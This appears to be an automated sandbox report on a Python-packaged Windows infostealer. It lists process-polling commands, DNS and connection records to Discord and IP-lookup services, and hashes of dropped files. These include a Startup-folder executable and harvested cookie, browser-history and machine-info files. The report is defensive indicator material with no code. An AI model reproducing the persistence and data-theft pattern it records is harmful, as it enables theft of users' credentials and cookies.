tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 virustotal.neocities.org udp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 2.233.51.198.in-addr.arpa udp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 198.51.233.2:443 virustotal.neocities.org tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 evcs-ocsp.ws.symantec.com udp
DE 152.199.19.74:80 evcs-ocsp.ws.symantec.com tcp
US 8.8.8.8:53 evcs-crl.ws.symantec.com udp
DE 152.199.19.74:80 evcs-crl.ws.symantec.com tcp
US 8.8.8.8:53 74.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.136.232:443 discord.com tcp
US 8.8.8.8:53 gateway.discord.gg udp
US 162.159.134.234:443 gateway.discord.gg tcp
N/A 127.0.0.1:64848 tcp
US 8.8.8.8:53 232.136.159.162.in-addr.arpa udp
US 8.8.8.8:53 234.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 api64.ipify.org udp
US 173.231.16.77:443 api64.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 77.16.231.173.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23842\gevent-24.11.1.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\AppData\Local\Temp\_MEI23842\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI23842\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI23842\base_library.zip

MD5 0361d8aca6e5625ac88a0fe9e8651762
SHA1 0a4502864421e98a7fbb8a7beb85ea1bd4e9687a
SHA256 c53613d4cd1f5bf5c532ea5154e5da20748c7bbce4af9fce0284075ef0261b0e
SHA512 0cf82fe095ed2eb38d463659c3198903f9b7c53dc368e5e68a6bf1a5a28335406af69b5214fba2307412bc7dba880de302431e7048d69c904ae63db93ee12cfe

C:\Users\Admin\AppData\Local\Temp\_MEI23842\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_wmi.pyd

MD5 7ec3fc12c75268972078b1c50c133e9b
SHA1 73f9cf237fe773178a997ad8ec6cd3ac0757c71e
SHA256 1a105311a5ed88a31472b141b4b6daa388a1cd359fe705d9a7a4aba793c5749f
SHA512 441f18e8ce07498bc65575e1ae86c1636e1ceb126af937e2547710131376be7b4cb0792403409a81b5c6d897b239f26ec9f36388069e324249778a052746795e

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_uuid.pyd

MD5 353e11301ea38261e6b1cb261a81e0fe
SHA1 607c5ebe67e29eabc61978fb52e4ec23b9a3348e
SHA256 d132f754471bd8a6f6d7816453c2e542f250a4d8089b657392fe61a500ae7899
SHA512 fa990b3e9619d59ae3ad0aeffca7a3513ab143bfd0ac9277e711519010f7c453258a4b041be86a275f3c365e980fc857c23563f3b393d1e3a223973a673e88c5

C:\Users\Admin\AppData\Local\Temp\_MEI23842\pyexpat.pyd

MD5 5e911ca0010d5c9dce50c58b703e0d80
SHA1 89be290bebab337417c41bab06f43effb4799671
SHA256 4779e19ee0f4f0be953805efa1174e127f6e91ad023bd33ac7127fef35e9087b
SHA512 e3f1db80748333f08f79f735a457246e015c10b353e1a52abe91ed9a69f7de5efa5f78a2ed209e97b16813cb74a87f8f0c63a5f44c8b59583851922f54a48cf5

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_ssl.pyd

MD5 5b9b3f978d07e5a9d701f832463fc29d
SHA1 0fcd7342772ad0797c9cb891bf17e6a10c2b155b
SHA256 d568b3c99bf0fc35a1f3c5f66b4a9d3b67e23a1d3cf0a4d30499d924d805f5aa
SHA512 e4db56c8e0e9ba0db7004463bf30364a4e4ab0b545fb09f40d2dba67b79b6b1c1db07df1f017501e074abd454d1e37a4167f29e7bbb0d4f8958fa0a2e9f4e405

\??\c:\users\admin\appdata\local\temp\_mei23842\zope.interface-7.2.dist-info\namespace_packages.txt

MD5 90b425bf5a228d74998925659a5e2ebb
SHA1 d46acb64805e065b682e8342a67c761ece153ea9
SHA256 429507be93b8c08b990de120298f2a642b43fad02e901d1f9ff7fabadce56fdf
SHA512 b0826bebfd6b27c30c5ac7c1bbb86935618dc9e41a893025439bf70b19f46eca1678a210831938e982189ab565d1f69766a8348d65d867b870a73ef05fb54b53

C:\Users\Admin\AppData\Local\Temp\_MEI23842\setuptools-75.8.0.dist-info\METADATA

MD5 e70c8fb8a6ee827b46079d635ce0cc3c
SHA1 18aefe6822466bfdd8af85c96729df776e313f51
SHA256 8a38c979e7476630c10f727747d74b73a3735b054b00c83797f06a8521332e49
SHA512 e981e365cac5c9e56df0561765998e1a3375943658e468dec49f3d4cb749f5b13da53e9c47a23fbd517369a67255bd8a0860a4a058f49ef111fe6fcbc6f311b4

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_asyncio.pyd

MD5 28d2a0405be6de3d168f28109030130c
SHA1 7151eccbd204b7503f34088a279d654cfe2260c9
SHA256 2dfcaec25de17be21f91456256219578eae9a7aec5d21385dec53d0840cf0b8d
SHA512 b87f406f2556fac713967e5ae24729e827f2112c318e73fe8ba28946fd6161802de629780fad7a3303cf3dbab7999b15b535f174c85b3cbb7bb3c67915f3b8d0

C:\Users\Admin\AppData\Local\Temp\_MEI23842\yarl\_quoting_c.cp312-win_amd64.pyd

MD5 ea44db84eb5858d4579fcb071d4de2f6
SHA1 1677d7d95fb7dd34b108787120adebe588d24b76
SHA256 8011cda4dd0e7c591c82d91243b6a8edfc4d95056e99bd123ade9cf02d76e32d
SHA512 e0fe02fdb3a645a232537fcc04427345b2532e489f5aa6aa59bcf03e98a038faba5a2f2f5f89c3190c6371a4b8d56c52962da826df0753caf875475bfb97aa8e

C:\Users\Admin\AppData\Local\Temp\_MEI23842\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI23842\multidict\_multidict.cp312-win_amd64.pyd

MD5 4eed96bbb1c4b6d63f50c433e9c0a16a
SHA1 cde34e8f1dac7f4e98d2b0aaf1186c6938de06c3
SHA256 b521b7e3b6bed424a0719c36735bc4bf2bb8b0926370b31c221c604e81f8d78b
SHA512 1cacb250d867fcbbc5224c3f66cb23a93f818bc1d0524cad6d1c52295d243af10f454fde13fa58671d3ee62281a2a3f71a69f28b08fd942fcedba3c9b09a774a

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_overlapped.pyd

MD5 ba368245d104b1e016d45e96a54dd9ce
SHA1 b79ef0eb9557a0c7fa78b11997de0bb057ab0c52
SHA256 67e6ca6f1645c6928ade6718db28aff1c49a192e8811732b5e99364991102615
SHA512 429d7a1f829be98c28e3dca5991edcadff17e91f050d50b608a52ef39f6f1c6b36ab71bfa8e3884167371a4e40348a8cda1a9492b125fb19d1a97c0ccb8f2c7b

C:\Users\Admin\AppData\Local\Temp\_MEI23842\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

MD5 4ce7501f6608f6ce4011d627979e1ae4
SHA1 78363672264d9cd3f72d5c1d3665e1657b1a5071
SHA256 37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b
SHA512 a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

C:\Users\Admin\AppData\Local\Temp\_MEI23842\libssl-3.dll

MD5 19a2aba25456181d5fb572d88ac0e73e
SHA1 656ca8cdfc9c3a6379536e2027e93408851483db
SHA256 2e9fbcd8f7fdc13a5179533239811456554f2b3aa2fb10e1b17be0df81c79006
SHA512 df17dc8a882363a6c5a1b78ba3cf448437d1118ccc4a6275cc7681551b13c1a4e0f94e30ffb94c3530b688b62bff1c03e57c2c185a7df2bf3e5737a06e114337

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_queue.pyd

MD5 6e0cb85dc94e351474d7625f63e49b22
SHA1 66737402f76862eb2278e822b94e0d12dcb063c5
SHA256 3f57f29abd86d4dc8f4ca6c3f190ebb57d429143d98f0636ff5117e08ed81f9b
SHA512 1984b2fc7f9bbdf5ba66716fc60dcfd237f38e2680f2fc61f141ff7e865c0dbdd7cdc47b3bc490b426c6cfe9f3f9e340963abf428ea79eb794b0be7d13001f6a

C:\Users\Admin\AppData\Local\Temp\_MEI23842\VCRUNTIME140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\_MEI23842\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_tkinter.pyd

MD5 1df0201667b4718637318dbcdc74a574
SHA1 fd44a9b3c525beffbca62c6abe4ba581b9233db2
SHA256 70439ee9a05583d1c4575dce3343b2a1884700d9e0264c3ada9701829483a076
SHA512 530431e880f2bc193fae53b6c051bc5f62be08d8ca9294f47f18bb3390dcc0914e8e53d953eee2fcf8e1efbe17d98eb60b3583bccc7e3da5e21ca4dc45adfaf4

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testinternalcapi.pyd

MD5 061e1a66e8126b876d74382647050e98
SHA1 5c87523567f9457d4fbfadeb7e9eae88976ba589
SHA256 a9bdca1f485b71f1b73ee92a370b9e21d9d01a2ed4d22c5a7a9d2bd43d8843f0
SHA512 77fa41723f485b01d9cdd9bfa0942a3171697d396b5b271503f218e1d694d4cd711e5a2dcb056fd62ccd1fe146495cf97703c92d4d9a2177eef4ad4eaac713f9

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_testcapi.pyd

MD5 5b7d59037d818c7de124886dea4a6582
SHA1 42364599cd533f8e206cfcc79869068576a27c1d
SHA256 f222b4bbb62e814e632ed08239aff96809b306ad94c724c0fd7ab47bf320fc1e
SHA512 deadcea1232ac752ab203454932f6787c3ee7fab247b0f7a7e8657789c3c0192b5484ef77f84f591ab28d51a1b84edf67d883a78f15a83c6d17d242c3e6a7d50

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_sqlite3.pyd

MD5 29464d52ba96bb11dbdccbb7d1e067b4
SHA1 d6a288e68f54fb3f3b38769f271bf885fd30cbf6
SHA256 3e96cd9e8abbea5c6b11ee91301d147f3e416ac6c22eb53123eaeae51592d2fe
SHA512 3191980cdf4ab34e0d53ba18e609804c312348da5b79b7242366b9e3be7299564bc1ec08f549598041d434c9c5d27684349eff0eaa45f8fa66a02dd02f97862b

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_elementtree.pyd

MD5 b479ed301e990690a30fc855e6b45f94
SHA1 177b508a602c5662350dae853b5e9db1475908a7
SHA256 0c488e6883a70cd54a71a9e28796f87ef6cc0d288260a965cbb24bf1d7309a20
SHA512 d410355bfe39a7666e7297d3654b0b8dd3919d4ae3bbf7d258acdf76276ecc3ba3718f09ba708e3103d367ea6d352e98b6de265e3746b973b421e0a68b8d37a8

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_cffi_backend.cp312-win_amd64.pyd

MD5 fcb71ce882f99ec085d5875e1228bdc1
SHA1 763d9afa909c15fea8e016d321f32856ec722094
SHA256 86f136553ba301c70e7bada8416b77eb4a07f76ccb02f7d73c2999a38fa5fa5b
SHA512 4a0e98ab450453fd930edc04f0f30976abb9214b693db4b6742d784247fb062c57fafafb51eb04b7b4230039ab3b07d2ffd3454d6e261811f34749f2e35f04d6

C:\Users\Admin\AppData\Local\Temp\_MEI23842\_brotli.cp312-win_amd64.pyd

MD5 9ad5bb6f92ee2cfd29dde8dd4da99eb7
SHA1 30a8309938c501b336fd3947de46c03f1bb19dc8
SHA256 788acbfd0edd6ca3ef3e97a9487eeaea86515642c71cb11bbcf25721e6573ec8
SHA512 a166abcb834d6c9d6b25807adddd25775d81e2951e1bc3e9849d8ae868dedf2e1ee1b6b4b288ddfbd88a63a6fa624e2d6090aa71ded9b90c2d8cbf2d9524fdbf

C:\Users\Admin\AppData\Local\Temp\_MEI23842\zlib1.dll

MD5 297e845dd893e549146ae6826101e64f
SHA1 6c52876ea6efb2bc8d630761752df8c0a79542f1
SHA256 837efb838cb91428c8c0dfb65d5af1e69823ff1594780eb8c8e9d78f7c4b2fc1
SHA512 f6efef5e34ba13f1dfddacfea15f385de91d310d73a6894cabb79c2186accc186c80cef7405658d91517c3c10c66e1acb93e8ad2450d4346f1aa85661b6074c3

C:\Users\Admin\AppData\Local\Temp\_MEI23842\winsound.pyd

MD5 f4efde2ca920a52135b00bf8f0545a87
SHA1 352e5ea2419ba876fb80e0d0d1e5dd12272a33e4
SHA256 9885b3d18903a2ef27428c7c9760493111cc97330ff0afcb57199964092e86bf
SHA512 f098af2851be213f83d19c0aa0ca82ded7bc41f51793502b9bed32d185b73b9cc8a9b29e25b3c5847b237aa466b14088e577f05b6bd03046aa65edb25c087e8d

C:\Users\Admin\AppData\Local\Temp\_MEI23842\tk86t.dll

MD5 9fb68a0252e2b6cd99fd0cb6708c1606
SHA1 60ab372e8473fad0f03801b6719bf5cccfc2592e
SHA256 c6ffe2238134478d8cb1c695d57e794516f3790e211ff519f551e335230de7de
SHA512 f5de1b1a9dc2d71ae27dfaa7b01e079e4970319b6424b44c47f86360faf0b976ed49dab6ee9f811e766a2684b647711e567cbaa6660f53ba82d724441c4ddd06

C:\Users\Admin\AppData\Local\Temp\_MEI23842\tcl86t.dll

MD5 21dc82dd9cc445f92e0172d961162222
SHA1 73bc20b509e1545b16324480d9620ae25364ebf1
SHA256 c2966941f116fab99f48ab9617196b43a5ee2fd94a8c70761bda56cb334daa03
SHA512 3051a9d723fb7fc11f228e9f27bd2644ac5a0a95e7992d60c757240577b92fc31fa373987b338e6bc5707317d20089df4b48d1b188225ff370ad2a68d5ff7ba6

C:\Users\Admin\AppData\Local\Temp\_MEI23842\sqlite3.dll

MD5 612fc8a817c5faa9cb5e89b0d4096216
SHA1 c8189cbb846f9a77f1ae67f3bd6b71b6363b9562
SHA256 7da1c4604fc97ba033830a2703d92bb6d10a9bba201ec64d13d5ccbfecd57d49
SHA512 8a4a751af7611651d8d48a894c0d67eb67d5c22557ba4ddd298909dd4fb05f5d010fe785019af06e6ca2e406753342c54668e9c4e976baf758ee952834f8a237

memory/1600-1248-0x0000020E118E0000-0x0000020E118E1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe

MD5 0e8ac8c96394c6a523f41e10788dd32d
SHA1 f5d5e6f86f5f12d25d3813406239341e19e2f4b4
SHA256 d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12
SHA512 8a7ff55f0232fe1fbd4b860f82835cf7e1b7ce9d9bc6dcaad92670e811fa599fbb29b9d902db516d9c512a283168d0f71cfe458cd707d0553748adade954c7d4

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0p3xh5ii.333.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2512-2455-0x00000262D7A90000-0x00000262D7AB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\downloads_db_n8y4

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\Users\Admin\AppData\Local\Temp\xs4afeszfpgj.db

MD5 013b18b14247306181ec7ae01d24aa15
SHA1 5ce4cb396bf23585fbcae7a9733fe0f448646313
SHA256 edb18b52159d693f30ba4621d1e7fd8d0076bfd062e6dda817601c29588bea44
SHA512 2035c94569822378b045c0953659d9745b02d798ab08afc6120974b73dd9747bb696571ea83b4780f0590ca9772fc856f79bea29694fe463b1a388337da8bd94

C:\Users\Admin\AppData\Local\Temp\7kz4qhj6sm3h.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\history_db_h4w3

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Roaming\passwords\vault\cookies.txt

MD5 ddb1c0ddf045a6bbbc5459de0134ec98
SHA1 b738894dfa60d34b80ea54f7d0b13466e425ea0d
SHA256 0703596c828badeb4ab871685950e07e7cb2f351c787e6bb1668141b6cb21949
SHA512 b7cd779e247f0a85bdd036f05bc30e88cf75213a45538304bb682e26907fc29bdbb4c33330872b55084fdf54b139af29f4d61f9df40892b748606e9feb3f8920

C:\Users\Admin\AppData\Roaming\passwords\vault\media\machineinfo.txt

MD5 759cc0bef3bd2884799deb8857191f77
SHA1 c2215d0fd2505621ff7f1c68e5ee3cc82bdfc60a
SHA256 b75e7ef4bdc9a76ff5708a88cd81e27a131b450c48be6764182e4a03c26ae8e1
SHA512 b004f9c692f40307506147b7e91a8c470f39c5a8953913b8e45159ea90a977feb665e64c1fe617e46eb62477d28d1acf4481b2e9f89f66e3f19bf10e7c5234dd